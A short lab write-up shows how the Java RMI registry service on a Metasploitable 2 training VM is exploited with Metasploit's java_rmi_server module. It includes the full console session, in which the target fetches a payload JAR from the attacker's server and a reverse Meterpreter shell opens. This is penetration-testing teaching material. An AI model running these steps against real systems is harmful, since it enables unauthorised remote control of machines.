The Nmap scan of Metasploitable 2 revealed:
PORT STATE SERVICE VERSION
1099/tcp open rmiregistry GNU Classpath grmiregistry
From Wiki:
The Java Remote Method Invocation (Java RMI) is a Java API that performs the object-oriented equivalent of remote procedure calls (RPC), with support for direct transfer of serialized Java objects and distributed garbage collection.
OK, let’s have a look in Metasploit:
msf > use exploit/multi/misc/java_rmi_server msf exploit(java_rmi_server) > show options Module options (exploit/multi/misc/java_rmi_server): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 1099 yes The target port SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Generic (Java Payload) msf exploit(java_rmi_server) > set RHOST 192.168.1.103 RHOST => 192.168.1.103 msf exploit(java_rmi_server) > exploit [*] Started reverse handler on 192.168.1.78:4444 [*] Using URL: http://0.0.0.0:8080/02Bwa0tNBOFx [*] Local IP: http://192.168.1.70:8080/02Bwa0tNBOFx [*] Connected and sending request for http://192.168.1.78:8080/02Bwa0tNBOFx/apQlsfJd.jar [*] 192.168.1.103 java_rmi_server - Replied to request for payload JAR [*] Sending stage (30355 bytes) to 192.168.1.103 [*] Meterpreter session 1 opened (192.168.1.78:4444 -> 192.168.1.103:54392) at 2013-11-13 09:19:06 +0000 [+] Target 192.168.1.103:1099 may be exploitable... [*] Server stopped. meterpreter >
Below is a video demonstrating the above exploit.